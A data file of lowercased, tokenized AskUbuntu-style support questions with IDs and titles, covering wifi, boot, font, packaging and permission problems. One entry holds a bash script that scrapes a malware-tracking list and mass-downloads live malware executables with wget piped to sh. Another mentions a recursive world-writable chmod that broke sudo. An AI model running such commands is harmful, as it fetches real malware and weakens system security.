189798	adding a password to an ubuntu live cd	i 've made a personal live cd on ubuntu builder but i did n't add a password to the live cd . is it possible to add a password to a live cd in any way ? ( before or after creating the cd )
189806	how can i prevent programs from running reboot scripts or `` reload your computer scripts from start up '' ?	i would like to prevent any program within my pc from running modified scripts without super user authorization , such as instruction on rebooting my pc from start up to forcing through software updates . how can i prevent packages from calling strong text/usr/share/update-notifier/notify-reboot-required this is to prevent any malicious program from running within my pc ? how can i do this ?
189809	how to disable the link missingfile on shotwell	i have some personal photos which are encrypted by cryptkeeper . i does n't like to disclose them to anyone . whenever i lke to view them , i mount them using cryptkeeper . i need to include these photos in shotwell photo manager at the time of mounting . so , i mounted them using cryptkeeper . then i imported them to shotwell . i made a new event and etc to organize and view those photos . after that i unmounted them using cryptkeeper because someone may see it . now i do n't want any single trail on shotwell beacuse of the same problem . but there is a new button 'missingfiles ' appeared and when i clicked on it , all the photo thumbnail which i unmounted showed there . i dont't want right'click on them and select 'remove from library ' ; beacuse when i want to view them next time on shotwell , i need to import , organize , etc at that time . so , the only option here is to disable the unavailability of that misssingfiles button .
189811	required plugin could not be found	i have the latest ubuntu version . when i try to open a .wmv file i got the error : required plugin could not be found . python ( v2.7 ) requires to install plugins to play media files of the following type : video/x-asf-unknown decoder what can i do to fix it ?
189815	copy lamp in another computer	i 've lamp installed in my laptop . now my question is 1 ) is this possible to copy lamp directories to another computer . 2 ) if possible , which directories i need to copy ? ? thanks .
189818	how to repair `` sudo : /etc/sudoers is mode 0640 , should be 0440 ? ''	why might sudo chmod -r a+w * cause sudo : /etc/sudoers is mode 0640 , should be 0440 sudo : no valid sudoers sources found , quitting and how might it be made to work ?
189820	the 20-gb storage with music , does it have to be used for music ?	the 20-gb storage with music , does it have to be used for music ? or can i use it for documents / whatever i want title prtty much says it all , just a question befor i decided if i wana take up on the offer : p
189821	how to access guest vms from outside network ?	my problem is how to access guest vm from outside network . i am going to describe my problem in details . i have single machine with ubuntu server 12.04 lts contains two nics . one nic is connected to my gateway ( i.e . 10.0.0.1 ) and 10.0.0.3 is ip address of this interface . another nic has ip 192.168.0.3 but this is a part of bridge ( i.e . br0 ) . i created two guest ubuntu 12.04 lts desktop vms with ip address 192.168.0.100 and 192.168.0.110 . my /etc/network/interfaces file is as following : the loopback network interface auto lo iface lo inet loopback the primary network interface auto eth2 iface eth2 inet manual auto eth1 iface eth1 inet dhcp auto br0 iface br0 inet static address 192.168.0.3 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 10.0.0.1 bridge_ports eth2 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off i am able to ping to 10.0.0.3 from guest vm . but i am unable to ping gateway ( i.e . 10.0.0.1 ) . i already had a ip forwarding enable in /etc/sysctl.conf . but i am able to access the internet from by host os . can i get help to access 10.0.0.1 and other networks from guest vms ?
189822	how to escape spaces in .desktop files exec line	i want to make a .desktop file like described here . [ desktop entry ] name=sublime text 2 genericname=sublime text 2 comment=edit text files exec=/home/user/opt/sublime/sublime text 2/sublime_text % u however , running that from nautilus 's context menu using open with this gives me could not find '/home/user/opt/sublime/sublime' so i tried exec= '' /home/user/opt/sublime/sublime text 2/sublime_text '' % u and got text ended before matching quote was found for `` . ( the text was ' '' /home/user/opt/sublime/sublime ' ) what is the correct way to escape spaces in the exec line of .desktop files ?
189827	how do i re-enable shadow in lubuntu 11.10 ?	does anybody know how to re-enable shadow effects in lubuntu 11.10 ? ? it was enabled at first ( without any extra tool ) , but somehow i managed to disable it . unfortunately i ca n't remember how !
189828	install wine 1.5 in ubuntu 10.04	how do i upgrade to wine 1.5 on ubuntu 10.04 ? i have tried sudo apt-get install wine1.5 , but i ca n't find it .
189835	strings : '/lib/libc.so.6 ' : no such file	i just started to use ubuntu . i installed the 12.04 64bit ubuntu . java and eclipse are installed and working fine . when i install accurev , i got the following error : preparing to install ... extracting the jre from the installer archive ... unpacking the jre ... extracting the installation resources from the installer archive ... configuring the installer for this system 's environment ... strings : '/lib/libc.so.6 ' : no such file launching installer ... ./accurev_5_4_1_linuxclientonly_x86_2_4.bin : 3310 : exec : /tmp/install.dir.2907/linux/resource/jre/bin/java : not found anybody can help me ? thanks edit : answers below plus asnswer here , or http : //www.accurev.com/ubbthreads/ubbthreads.php/topics/3812/cannot_install_accurev5_4_1_on # post3812
189836	unable to connect to wifi network after updates	i 'm running 12.04 , and had no problems with wifi until i installed updates last night ( there were quite a few , and i 'm not sure how to see what was installed ) . it might be unrelated , but it 's the only thing that 's changed . i can no longer connect to my home wifi network . some networks ( like my android hotspot ) work fine , but connecting to our bt home hub just times out and prompts for authentication as well . the laptop is an hp elitebook 8470p , which has a 'centrino advanced-n 6205 ' card ( reported in lshw , i 'm not sure if it 's a brand name for another card ) . here 's what 's in my syslog , the error seems to be 'failed to insert dummy sta entry for the ap ' : sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : get_secret_flags : assertion `is_secret_prop ( setting , secret_name , error ) ' failed sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > activation ( wlan0/wireless ) : connection 'bthub3-8zrt 1 ' has security , and secrets exist . no new secrets needed . sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > config : added 'ssid ' value 'bthub3-8zrt' sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > config : added 'scan_ssid ' value '1' sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > config : added 'key_mgmt ' value 'none' sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > config : added 'wep_key0 ' value ' < omitted > ' sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > config : added 'wep_tx_keyidx ' value '0' sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > config : set interface ap_scan to 1 sep 17 16:56:43 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning sep 17 16:56:47 richard-hp-elitebook-8470p wpa_supplicant [ 1506 ] : trying to authenticate with 00 : fe : f4:75:56:50 ( ssid='bthub3-8zrt ' freq=2412 mhz ) sep 17 16:56:47 richard-hp-elitebook-8470p wpa_supplicant [ 1506 ] : ctrl-event-disconnected bssid=00 : fe : f4:75:56:50 reason=2 sep 17 16:56:47 richard-hp-elitebook-8470p kernel : [ 291.593766 ] wlan0 : deauthenticating from 00 : fe : f4:75:56:50 by local choice ( reason=2 ) sep 17 16:56:47 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating sep 17 16:56:47 richard-hp-elitebook-8470p wpa_supplicant [ 1506 ] : trying to associate with 00 : fe : f4:75:56:50 ( ssid='bthub3-8zrt ' freq=2412 mhz ) sep 17 16:56:47 richard-hp-elitebook-8470p wpa_supplicant [ 1506 ] : association request to the driver failed sep 17 16:56:47 richard-hp-elitebook-8470p kernel : [ 291.595197 ] wlan0 : authenticate with 00 : fe : f4:75:56:50 ( try 1 ) sep 17 16:56:47 richard-hp-elitebook-8470p kernel : [ 291.597584 ] wlan0 : authenticated sep 17 16:56:47 richard-hp-elitebook-8470p kernel : [ 291.597763 ] wlan0 : failed to insert dummy sta entry for the ap ( error -17 ) sep 17 16:56:47 richard-hp-elitebook-8470p networkmanager [ 998 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating does anyone have any idea what the problem might be , and how to fix it ? thanks very much for any help !
189839	what fonts do i need to install for special characters to work ?	what fonts do i need to install on ubuntu in order to see special characters ( for example ) ?
189844	how to use a different gtk ( gtk3 ) theme for some applications ?	i want to use a custom theme for nautilus and for some other applications but i want to keep the generic theme for the rest of the applications and system . i know it can be done in gtk2 . for example the theme i 'm using now uses a dark theme for the terminal and the image viewer and the rest of applications that look clear with it . is there a simple way to do it , like setting a path to a existing theme for each application i want to customize ? i hope you know what i mean , my english is n't that good . thanks .
189845	laptop shuts down upon waking up from suspend	i recently installed ubuntu 12.04 on my fujitsu siemens esprimo mobile v5505 with the following configuration : processor : intel core 2 duo cpu t5750 2.00ghz graphics card ( integrated ) : intel 965gm x86/mmx/sse2 other things pretty much standard . now after putting my laptop to sleep ( by closing the lid ) or hibernating , when i wake it up ( by opening the lid ) four things happen : laptop login window is shown ( normal behavior ) - 10 % of time laptop suddenly shut downs for no reason - 30 % of time when ubuntu goes into desktop screen all icons or windows are blurred or screwed - 30 % of time black screen is shown ( it does n't disappear by moving the mouse ) and i need to manually shut down the laptop - 30 % of time what i believe this is caused by drivers for my integrated graphics card , but there is nothing in `` additional drivers '' . i hope there are some solutions for this crazy problem which makes my laptop not usable at all .
189846	how do i configure swift acls ?	how do i configure a swift container to allow public ( anonymous read ) unauthenticated access to all objects ?
189847	lenovo thinkpad l530 - sd card reader not working	the sd card reader on my new l530 is not working . please let me know what diagnostics i can provide to help fix this . thanks .
189854	how can i start spideroak automatically on a headless server ?	i use spideroak for online backup and file synchronisation ( a la dropbox . ) i 'm running it on my headless server via the spideroak -- headless command . at the moment , i have to start this manually inside a screen session to keep it running . this means i have to remember to start my backup software each time i restart the server ( not ideal . ) how can i start spideroak automatically with the rest of the system processes ? ( for extra points , how can i monitor it to make sure it stays alive ? ) i 've tried adding a spideroak.conf file to the upstart services in /etc/init as shown below , but it fails to start because spideroak needs to run as my normal user account ( not root . ) root @ helios : ~/.spideroak # cat /etc/init/spideroak.conf description `` the spideroak automatic cloud backup service . '' # start when system starts . start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] exec spideroak -- headless
189855	how to print standard error in red	how can i print the standard error in red into the console instead of using the same color of the standard output ? is it possible using gnome terminal ?
189857	is there a way to hide & reveal the launcher at will with the press of a key ?	i 'm using ubuntu 12.04 with the default unity desktop environment . i 'm aware of all the keyboard shortcuts that relate to the launcher as well as the possible tweaks using ubuntu tweak tool , unsettings , myunity . what i 'd like to know is this : is there a way to hide & reveal the launcher at will with the press of a key ? example given , press key a , launcher hides , press key a again and launcher is revealed until i press the a key once more and so forth . the autohide function wo n't do because i want the launcher to stay visible once revealed .
189861	chrome flash problems	i guess this happened after the most recent update of the system . if i open chrome : //plugins i see the following : flash ( 2 files ) - version : 11.2 r202 shockwave flash 11.2 r202 name : shockwave flash description : shockwave flash 11.3 r31 version : 11.3.31.232 location : /opt/google/chrome/pepperflash/libpepflashplayer.so type : ppapi ( out-of-process ) enable name : shockwave flash version : 11.2 r202 location : /usr/lib/adobe-flashplugin/libflashplayer.so type : npapi if both are enabled ( or only the first one ) , video and sound are too fast , if the first one is disabled , video is too slow but sound is normal . how do i solve this ?
189863	youtube videos on khan academy do not play	i just finished installing ubuntu . youtube videos do not play . i 'd like to be able to view khan academy videos , which i think are youtube videos . when i go to ka , the video area is black until i put my cursor there . then it goes white . according to the software center , the adobe flash player is installed .
189864	accurev does n't install due to missing java	i am trying to install accurev on my ubuntu 12.04 machine . java is installed . i got the following error : ./accurev_5_4_1_linuxclientonly_x86_2_4.bin : 3310 : exec : /tmp/install.dir.3817/linux/resource/jre/bin/java : not found it seems the bin file is extracted into a temp directory and then install from there but somehow there is no java found . i installed the java and other java programs running fine . java and javac link are also created in /usr/bin location . how can i make the installation use java installed in the system ?
189866	can not install acrobat reader on ubuntu 12.04.1	i have been trying to install acrobat reader on my ubuntu 12.04.1 . in the be ; ggining , i tried to install it from the software-center , but it crashes with the report : ( reading database ... 189311 files and directories currently installed . ) unpacking acroread ( from ... /acroread_9.5.1-1precise1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/acroread_9.5.1-1precise1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/acroread ' , which is also in package adobereader-ptb 8.1.7-2 no apport report written because maxreports is reached already processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/acroread_9.5.1-1precise1_i386.deb '' as as solution , i tried to install it via terminal , with the $ sudo apt-get install acroread and receive the following : arcanjo @ arcanjo : ~ $ sudo apt-get install acroread lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto pacotes sugeridos : libldap2 libgnome-speech7 os novos pacotes a seguir serão instalados : acroread 0 pacotes atualizados , 1 pacotes novos instalados , 0 a serem removidos e 0 não atualizados . é preciso baixar 60,1 mb de arquivos . depois desta operação , 142 mb adicionais de espaço em disco serão usados . obter:1 http : //archive.canonical.com/ubuntu/ precise/partner acroread i386 9.5.1-1precise1 [ 60,1 mb ] baixados 60,1 mb em 4min 17s ( 234 kb/s ) ( lendo banco de dados ... 189311 ficheiros e directórios actualmente instalados . ) desempacotando acroread ( de ... /acroread_9.5.1-1precise1_i386.deb ) ... dpkg : erro processando /var/cache/apt/archives/acroread_9.5.1-1precise1_i386.deb ( -- unpack ) : a tentar sobre-escrever '/usr/bin/acroread ' , que também está no pacote adobereader-ptb 8.1.7-2 nenhum relatório apport escrito pois maxreports já foi atingido processando gatilhos para desktop-file-utils ... processando gatilhos para bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processando gatilhos para gnome-menus ... processando gatilhos para man-db ... erros foram encontrados durante o processamento de : /var/cache/apt/archives/acroread_9.5.1-1precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) arcanjo @ arcanjo : ~ $ i 've already tried to upgrade and update the apt-get , also tried to remove and re-install the software-center , tried deleting the `` problematic '' files and re-updating the apt-get ... nothing seems to work ... any solutions ?
189868	alternative to | more to display error results page by page	the command psql -d template_postgis2 -f /usr/share/postgresql/9.1/contrib/postgis-2.1/postgis.sql returns a list of errors that is too long to be displayed by scrolling up to the beginning of the error . i tried the same command with `` | more '' and `` | less '' added up at the end of the command but it does not display the message page by page as it should . i also tried to put the output in a file with `` > file.txt '' but i do not get in this new file what is displayed on the screen ! ! i do n't understand why . i guess i ca n't do this with a psql command ? ? is there any other way to get all the error message ? thanks for your help !
189872	ubuntu keeps ending my session	i tried to configure my ubuntu to different configurations . those things did not works . so , i reset everything back to what it was . and now , a problem keeps occurring . every now and then my session ends automatically . for example , when in unity2d mode , whenever i press the super key , the session ends and returns to the login screen . or when i am using texmaker , per se , it ends whenever i click on to create a new document . when the session resumes it shows a crash report for xorg . these are the last lines of error log that i had in ~/.xsession-errors file ** ( zeitgeist-datahub:4347 ) : warning ** : zeitgeist-datahub.vala:227 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! sh : 1 : dropbox : not found window manager warning : unity-2d-shellreceived a net_current_desktop message from a broken ( outdated ) client who sent a 0 timestamp : [ warning ] wnck : received a timestamp of 0 ; window activation may not function properly . window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x3c00005 ( terminal ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . window manager warning : unity-2d-shell : received a net_current_desktop message from a broken ( outdated ) client who sent a 0 timestamp [ warning ] wnck : received a timestamp of 0 ; window activation may not function properly . window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x3c00005 ( terminal ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . i cant figure out the source of the problem . how do i rectify this ? this is ubuntu 12.04 btw
189875	xubuntu - download error with wubi	09-17 13:01 debug commonbackend : could not find any iso or cd , downloading one now 09-17 13:01 debug tasklist : new task get_metalink 09-17 13:01 debug tasklist : # # # running get_metalink ... 09-17 13:01 debug downloader : downloading http : //cdimage.ubuntu.com/xubuntu/releases/12.04/release/xubuntu-12.04-desktop-amd64.metalink c : \ubuntu\install 09-17 13:01 error commonbackend : can not download metalink file http : //cdimage.ubuntu.com/xubuntu/releases/12.04/release/xubuntu-12.04-desktop-amd64.metalink err= [ errno 14 ] http error 404 : not found 09-17 13:01 debug downloader : downloading http : //cdimage.ubuntu.com/xubuntu/daily-live/current/precise-desktop-amd64.metalink c : \ubuntu\install 09-17 13:01 error commonbackend : can not download metalink file2 http : //cdimage.ubuntu.com/xubuntu/daily-live/current/precise-desktop-amd64.metalink err= [ errno 14 ] http error 404 : not found 09-17 13:01 debug tasklist : finished get_metalink 09-17 13:01 error tasklist : can not download the metalink and therefore the iso traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 406 , in download_iso exception : can not download the metalink and therefore the iso 09-17 13:01 debug tasklist : # cancelling tasklist 09-17 13:01 debug tasklist : # finished tasklist 09-17 13:01 error root : can not download the metalink and therefore the iso traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file '' \lib\wubi\application.py '' , line 132 , in select_task file '' \lib\wubi\application.py '' , line 158 , in run_installer file '' \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file '' \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file '' \lib\wubi\backends\common\backend.py '' , line 406 , in download_iso exception : can not download the metalink and therefore the iso yes im connected to the internet . and i manually went to the site that its trying to get the image from . and i can get to the site , but the iso it is trying to get is not there .
189876	mouse keeps freezing ramdomly	i used this command to see if my pc can locate my mouse ; xsetpointer -1 | grep pointer reponse is extended device -1 not found my question is did i type in the right command or is there something else i can do to locate the mouse . i 'm using a usb gateway mouse , i 'm not sure if the problem is coming from my usb slots or the mouse itself . apt-cache search mouse settings gnome-settings-daemon - daemon handling the gnome session settings xserver-xorg-input-synaptics - synaptics touchpad driver for x.org server gnome-applets - various applets for the gnome panel - binary files hama-slide-mouse-control - control the dpi setting and thumb buttons of a hama slide s1 gaming mouse kephra - gui text editor along perl alike paradigms libgpds-dbg - library for configuration of pointing devices ( debug symbols ) libjs-flot - plotting library for jquery lxinput - program to configure keyboard and mouse settings for lxde lxsession - default session manager for lxde tint2 - lightweight taskbar tint2-dbg - lightweight taskbar ( debug symbols ) wmix - dockapp mixer for oss wmlongrun - a program to monitor longrun status xfce4-settings - graphical application for managing xfce settings xkbset - small utility to change the accessx settings of xkeyboard xwit - collection of simple routines to call some x11 functions updated : this is the reading i 'm getting from search settings .
189883	synaptics mousepad does not work properly after update	ever since i updated my system on 11.09. my mousepad has n't been working properly . xserver-xorg-input-synaptics 1.6.2-1ubuntu1~precise1 has been replaced by xserver-xorg-input-synaptics 1.6.2-1ubuntu1~precise2 . now the vertical scrollbar doesn`t work . if you want to scroll vertical you have to touch the left side ( about 1 cm from the scrollbar away ) to scroll . and this sucks , it does n't work properly . i am not able to downgrade the package . if i want to uninstall the current one i have to remove the whole xorg ( software center ) . i have downloaded an earlier version and want to install it but the software center says that there is a later version installed .
189888	how can i solve my xampp issue ?	i have this type of error when starting xampp : starting xampp for linux 1.7.7 ... xampp : another web server daemon is already running . xampp : starting mysql ... xampp : could n't start mysql ! xampp : another ftp daemon is already running . xampp for linux started . how can be it solved ? ? can any one help me please ?
189892	trying to run 32bit windows game in wine on 64bit 12.04	i am trying to run icewind dale2 from gog.com in wine on ubuntu 12.04 64bit . i am using the amd ati binary blob display driver . running the file command on /usr/lib32/fglrx/libgl.so.1.2 gives : george @ devbox : /usr/lib32/fglrx $ file libgl.so.1.2 libgl.so.1.2 : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked , stripped george @ devbox : /usr/lib32/fglrx $ so i definetly have 32bit opengl . i am using latest playonlinux and tried this on wine 1.4 and 1.5 ... how can i force wine to use my opengl library ?
189893	ca n't boot into windows7 or ubuntu 12.04 after running boot-repair	i have installed ubuntu 12.04 on my preinstalled windows 7 sony vaio e series laptop following instructions here : http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ everything went well and i am able to boot into windows after completing installation of ubuntu . now following instructions on web i tried to add ubuntu to my bios using easy bcd ( but forget to add windows 7 entry ) . as a result , i loose windows 7 os and ca n't boot into either os then i successfully repaired windows 7 using recovery cd . now my problem is that i ca n't reinstall ubuntu 12.04 using live cd it halts every time before disk partition step giving error . ubi-partman crashed . ubi-partman failed with exit code 141. further information may be found in /var/log/syslog . do you want to try running this step again before continuing ? if you do not , your installation may fail entirely or may be broken . and , any choice to continue will result in the same error . after that following some solutions i ran boot-repair commands in terminal ( from live ubuntu mode ) and got the following output . : http : //paste.ubuntu.com/1206434/ now , after restart i ca n't boot into either windows or ubuntu . even any attempt to run windows repair is failed and i got the message : 'no operating system found ' i do n't know what went wrong after running boot-repair command . please help in solving this issue .
189894	why can i mount and read an encrypted home from another linux installation , without asking for a password ?	not only is home directory encryption veery noticeably affecting performance on my laptop ( early c2d ) , but i also just discovered , that i can mount and read files on that `` encrypted '' home when booting my pc from another linux installation without the password being asked ! i basically have two questions : wtf ? ? this approach is flawed and is dangerous , since it gives false sense of security to the people . it is also terribly slow . why is it still there ?
189897	python/gtk3 set modal window issue	i have an application that has two gtk.window 's and one of them calls the another , but when using gtk.window.set_modal ( true ) it does n't work , i still can interact with the main window ... any help ? regards
189907	what is the default root password ?	i installed ubuntu 12.04 lts ( precise pangolin ) , 64 bit . nowhere was i asked to set password for root . i just installed accurev scm software . it was installed under the /root folder by default . now i try do something on that folder . i tried with su to switch to root , but i do n't know its password . should i always use sudo or get the default root password , if any ? how do i create a launcher for software installed inside the /root directory ?
189914	transfer music/pictures to my lumia 710 ( windows 7.5 phone )	i read some where that if i mount my `` nokia lumia 710 '' as a media device i can sync data . but i am unable to do so .
189915	software installation problem	i just installed ubuntu today and i went to the ubuntu software center to install adobe flash player . and when the install button is pressed , i received the following message : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . futhermore there could be a conflict between software packages which are not allowed to be installed at the same time . please help me .
189918	flipped image on webcam cnf129	i 'm using cnf129 chicony webcam , which is built in to my asus k50ij notebook , with ubuntu 12.04 64-bit . skype shows a flipped image . i 've tried every solution on the web but none works . any new ideas about this issue ?
189922	how do i increase screen resolution in ubuntu 12.04 ? i want 1366x768	i get the following output when i run xrandr : screen 0 : minimum 320 x 200 , current 1280 x 800 , maximum 8192 x 8192 lvds1 connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 304mm x 190mm 1280x800 60.0*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) please give me a suggestion how to get 1366x768 .
189924	unable to write to directory	hello and apologies if this has been asked ... i could n't find the answer easily . i am using ubuntu server 12.04 i ca n't write to a directory where my user should belong to the directory 's group ... total 12 -rw-rw-r -- 1 www-data root 30 sep 17 13:34 index.php drwxrwxr-x 7 www-data root 4096 sep 17 13:34 twentyeleven drwxrwxr-x 4 www-data root 4096 sep 17 13:34 twentyten dp : dp adm cdrom sudo dip www-data plugdev lpadmin sambashare www-pub here is the updated listing ... -rw-rw-r -- 1 www-data root 28 sep 17 13:34 index.php drwxrwxr-x 3 www-data root 4096 sep 17 13:34 plugins drwxrwxr-x 4 www-data root 4096 sep 17 13:34 themes dp @ acme : /var/www/stlit/wp-content $ cd themes dp @ acme : /var/www/stlit/wp-content/themes $ ls -la total 20 drwxrwxr-x 4 www-data root 4096 sep 17 13:34 . drwxrwxr-x 4 www-data root 4096 sep 17 13:34 .. -rw-rw-r -- 1 www-data root 30 sep 17 13:34 index.php drwxrwxr-x 7 www-data root 4096 sep 17 13:34 twentyeleven drwxrwxr-x 4 www-data root 4096 sep 17 13:34 twentyten i am a noob to ubuntu so i am sure this is a mistake on my part . please let me know if i need to provide more information .
189926	how can i prevent dpkg-buildpackage from modifying the modification date of the /debian directory when building a debian package ?	i have set up a working pbuilder toolchain for building debian packages in i386 and amd64 varieties for ubuntu . i am using reprepro to manage my own private apt repository and dupload to upload .changes , .dsc , .deb , .orig.tar.gz and .debian.tar.gz files into it . all of this is well documented and it works . but i am failing to upload the i386 version of one package together with the amd64 version of the same package . reprepro complains with the following message : file `` pool/main/p/package/package_1.0.dsc '' is already registered with different checksums ! the source of the generated i368 and amd64 binary packages are exactly the same and have not been modified by me . how can it be that there is a different checksum ? i investigated and discovered that the checksum difference of the .dsc file is because it contains a differing checksum of the file package_1.0.debian.tar.gz . further investigations showed that the package_1.0.debian.tar.gz file has indeed different checksums every time dpkg-buildpackage is invoked by the debian build toolchain . the reason is that it changes the modification time of the /debian subdirectory of a debian package . the tar program unfortunately includes the modification time into the resulting archive , leading to different checksums every time the toolchain is run . so , my question is : how can i prevent dpkg-buildpackage from modifying the modification date of the /debian directory when building a debian package ? if i could do that , the checksum of the files package_1.0.debian.tar.gz and package_1.0.dsc would stay constant , and i could painlessly upload to reprepro .
189928	how to create a launcher for software installed inside root directory	i am using ubuntu 12.04 64bit . how to create a launcher for a software installed inside root directory , when i login as a regular user account ?
189931	bash script help required	i am trying to get this bash script that i found on a forum to work . copied it to text editor . saved it as script.sh chmod 700 and tried to run it . rootdir= '' /usr/share/malware '' day=`date + % y % m % d` url=`echo `` wget -qo - http : //lists.clean-mx.com/pipermail/viruswatch/ $ day/thread.html |\ awk '/\ [ virus/'|tail -n 1|sed 's : \ '' : : g ' |\ awk ' { print \ '' http : //lists.clean-mx.com/pipermail/viruswatch/ $ day/\ '' $ 3 } ' '' |sh` filename=`wget -qo - http : //lists.clean-mx.com/pipermail/viruswatch/ $ day/thread.html |\ awk '/\ [ virus/'|tail -n 1|sed 's : '' : : g ' |awk ' { print $ 3 } '` links -dump $ url $ filename | awk '/up/'|grep `` tr\|exe '' | awk ' { print $ 2 , $ 8 , $ 10 , $ 11 , $ 12 '' \n '' } ' > $ rootdir/ > $ filename dirname=`wget -qo - http : //lists.clean-mx.com/pipermail/viruswatch/ $ day/thread.html |\ awk '/\ [ virus/'|tail -n 1|sed 's : '' : : g ' |awk ' { print $ 3 } '|sed 's : .html : :g'` rm -rf $ rootdir/ $ dirname mkdir $ rootdir/ $ dirname cd $ rootdir grep `` exe $ '' $ filename |awk ' { print `` wget \ '' '' $ 5 '' \ '' '' } ' | sh ls *.exe | xargs md5 > > checksums mv *.exe $ dirname rm -r $ rootdir/*exe* mv checksums $ rootdir/ $ dirname mv $ filename $ rootdir/ $ dirname i get the following message.. script.sh : line 11 : /usr/share/malware/ : is a directory script.sh : line 11 : links : command not found
189937	no sound from shared media	i have a shared media folder that i have all of my mp3 's in . when i try to play them using ubuntu , i get no sound , but the media player ( rhythmbox , exaile , etc ) display that they are playing the file , it looks like everything is playing but no sound . i have checked and rechecked the volume levels of the system and each application and i see no issues . if i move a file to the local drive , it plays just fine . i do sound checks while the file is playing and i get audio ( front left , front right ) from the test but not from the media file that i am playing . any help would be greatly appreciated .
189939	how to see object code generated by g++ ?	g++ -c xyz.cpp creates an object file xyz.o but when i open it in vim editor it shows some crazy text ... how can i see the machine code ? what package can use to open and see that machine code ?
189940	unable to free space in /boot	running : linux ips-svf-1 3.0.0-22-server # 36-ubuntu smp tue jun 12 17:56:20 utc 2012 x86_64 x86_64 x86_64 gnu/linux i 'm trying to free space in /boot with apt-get -y purge , but every time i run the command i get an error about unmet dependencies : sudo apt-get -y purge linux-headers-3.0.0-12 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-headers-3.0.0-12-server : depends : linux-headers-3.0.0-12 but it is not going to be installed linux-image-server : depends : linux-image-3.0.0-26-server but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . however , i ca n't run apt-get -f install since /boot is full . i also tried running dpkg -- purge and dpkg -- remove manually , but both give the same unmet dependency error . any suggestions on how i can successfully free space in /boot ? is there anything i can safely delete with rm ?
189945	install chinese ( and other utf-8 ) fonts for xvfb ?	i have installed these packages : apt-get install xvfb xfonts-base xfonts-75dpi xfonts-100dpi firefox but in my firefox in xvfb on ubuntu server , the chinese characters look like : how to install proper fonts for my xvfb ? edit : i have also installed xfonts-intl-chinese but it does n't help .
189960	how i can improve the font rendering ?	i want to know if there is a form to improve the rendering of the fonts in ubuntu 12.04 like in gnome 2.xx . thanks
189961	kmail error : sorry , that domain is n't in my list of allowed rcpthosts ( # 5.7.1 ) '' )	kmail : `` sorry , that domain is n't in my list of allowed rcpthosts ( # 5.7.1 ) '' ) what can i do ? someone who knows how to setup kmail correctly ? nor automatic or hand procedure works .
